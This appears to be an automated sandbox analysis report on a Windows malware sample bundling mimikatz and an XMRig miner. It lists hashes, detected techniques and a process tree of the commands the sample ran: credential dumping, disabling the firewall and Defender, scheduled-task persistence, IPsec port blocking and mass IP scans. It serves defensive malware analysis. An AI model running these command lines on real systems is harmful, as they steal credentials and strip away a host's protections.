Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-08-2024 00:14

General

  • Target

    2024-08-25_893dee1fa144ef67eca537ce586b2079_hacktools_icedid_mimikatz.exe

  • Size

    10.5MB

  • MD5

    893dee1fa144ef67eca537ce586b2079

  • SHA1

    0ffb84563bd2e6e6a28f955a9a006ff00a86579b

  • SHA256

    047b035f2bc6dbefe1d046cc0e9a7e11bae1c2e7af6928710dbc385dcbed428e

  • SHA512

    6e3a11fc48bdfcbe62f855fc63fd866a6d3509733583b8faa0015ea936637987fa6c2383336c8bbcff906684383df800684a0158ecfe7e31af7678c1bc8294f1

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (22081) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1716
      • C:\Windows\TEMP\ttheakefb\gckntm.exe
        "C:\Windows\TEMP\ttheakefb\gckntm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3164
    • C:\Users\Admin\AppData\Local\Temp\2024-08-25_893dee1fa144ef67eca537ce586b2079_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-25_893dee1fa144ef67eca537ce586b2079_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3544
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lvpuunkb\phznlij.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2492
        • C:\Windows\lvpuunkb\phznlij.exe
          C:\Windows\lvpuunkb\phznlij.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3940
    • C:\Windows\lvpuunkb\phznlij.exe
      C:\Windows\lvpuunkb\phznlij.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3196
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:384
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2756
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2228
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1564
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:460
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3192
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3212
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:3236
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3992
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\teigzljfc\pekntqkbk\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2000
          • C:\Windows\teigzljfc\pekntqkbk\wpcap.exe
            C:\Windows\teigzljfc\pekntqkbk\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:856
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2576
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1224
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4052
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3524
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3056
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                  PID:2500
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:3784
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1868
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2732
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3736
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:428
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:804
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1432
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:1756
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\teigzljfc\pekntqkbk\islkeazek.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teigzljfc\pekntqkbk\Scant.txt
                  2⤵
                    PID:4064
                    • C:\Windows\teigzljfc\pekntqkbk\islkeazek.exe
                      C:\Windows\teigzljfc\pekntqkbk\islkeazek.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\teigzljfc\pekntqkbk\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:640
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\teigzljfc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\teigzljfc\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2880
                    • C:\Windows\teigzljfc\Corporate\vfshost.exe
                      C:\Windows\teigzljfc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1888
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bjpbletlu" /ru system /tr "cmd /c C:\Windows\ime\phznlij.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2172
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:628
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "bjpbletlu" /ru system /tr "cmd /c C:\Windows\ime\phznlij.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1472
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hbtnlbnbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvpuunkb\phznlij.exe /p everyone:F"
                      2⤵
                        PID:1280
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                            PID:2032
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "hbtnlbnbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lvpuunkb\phznlij.exe /p everyone:F"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:2152
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vhtckubbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttheakefb\gckntm.exe /p everyone:F"
                          2⤵
                            PID:4788
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              3⤵
                                PID:3732
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /sc minute /mo 1 /tn "vhtckubbu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttheakefb\gckntm.exe /p everyone:F"
                                3⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:3336
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:4784
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:1460
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:1244
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:4644
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:536
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:3528
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:2728
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:3992
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:3928
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:716
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:5096
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static set policy name=Bastards assign=y
                              2⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:4700
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop SharedAccess
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4596
                              • C:\Windows\SysWOW64\net.exe
                                net stop SharedAccess
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:860
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop SharedAccess
                                  4⤵
                                    PID:1472
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c netsh firewall set opmode mode=disable
                                2⤵
                                  PID:3980
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh firewall set opmode mode=disable
                                    3⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:4524
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c netsh Advfirewall set allprofiles state off
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1956
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh Advfirewall set allprofiles state off
                                    3⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:2176
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop MpsSvc
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2756
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop MpsSvc
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:936
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop MpsSvc
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:620
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop WinDefend
                                  2⤵
                                    PID:3516
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop WinDefend
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2556
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop WinDefend
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4064
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net stop wuauserv
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1868
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop wuauserv
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3020
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop wuauserv
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2972
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config MpsSvc start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:436
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config MpsSvc start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      PID:1592
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config SharedAccess start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1680
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2140
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                      PID:2180
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config WinDefend start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:3284
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config wuauserv start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3784
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config wuauserv start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        PID:1900
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 780 C:\Windows\TEMP\teigzljfc\780.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4272
                                    • C:\Windows\TEMP\xohudmc.exe
                                      C:\Windows\TEMP\xohudmc.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5044
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1016 C:\Windows\TEMP\teigzljfc\1016.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3220
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1716 C:\Windows\TEMP\teigzljfc\1716.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2664
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 2568 C:\Windows\TEMP\teigzljfc\2568.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1260
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 2832 C:\Windows\TEMP\teigzljfc\2832.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1552
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 3000 C:\Windows\TEMP\teigzljfc\3000.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4532
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1040 C:\Windows\TEMP\teigzljfc\1040.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3032
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 3880 C:\Windows\TEMP\teigzljfc\3880.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4156
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 3968 C:\Windows\TEMP\teigzljfc\3968.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2508
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 4032 C:\Windows\TEMP\teigzljfc\4032.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1756
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 3716 C:\Windows\TEMP\teigzljfc\3716.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1916
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 2856 C:\Windows\TEMP\teigzljfc\2856.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3168
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 4340 C:\Windows\TEMP\teigzljfc\4340.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1268
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1160 C:\Windows\TEMP\teigzljfc\1160.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1996
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 548 C:\Windows\TEMP\teigzljfc\548.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4568
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1952 C:\Windows\TEMP\teigzljfc\1952.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4156
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 4112 C:\Windows\TEMP\teigzljfc\4112.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1680
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 3664 C:\Windows\TEMP\teigzljfc\3664.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3928
                                    • C:\Windows\TEMP\teigzljfc\gveebtguf.exe
                                      C:\Windows\TEMP\teigzljfc\gveebtguf.exe -accepteula -mp 1336 C:\Windows\TEMP\teigzljfc\1336.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4776
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c C:\Windows\teigzljfc\pekntqkbk\scan.bat
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2244
                                      • C:\Windows\teigzljfc\pekntqkbk\tinlykfeb.exe
                                        tinlykfeb.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                                        3⤵
                                        • Executes dropped EXE
                                        • Drops file in Windows directory
                                        PID:2068
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5164
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4856
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5644
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1832
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3176
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2724
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2340
                                  • C:\Windows\SysWOW64\joxnkm.exe
                                    C:\Windows\SysWOW64\joxnkm.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:732
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\phznlij.exe
                                    1⤵
                                      PID:4588
                                      • C:\Windows\ime\phznlij.exe
                                        C:\Windows\ime\phznlij.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4612
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\lvpuunkb\phznlij.exe /p everyone:F
                                      1⤵
                                        PID:5068
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
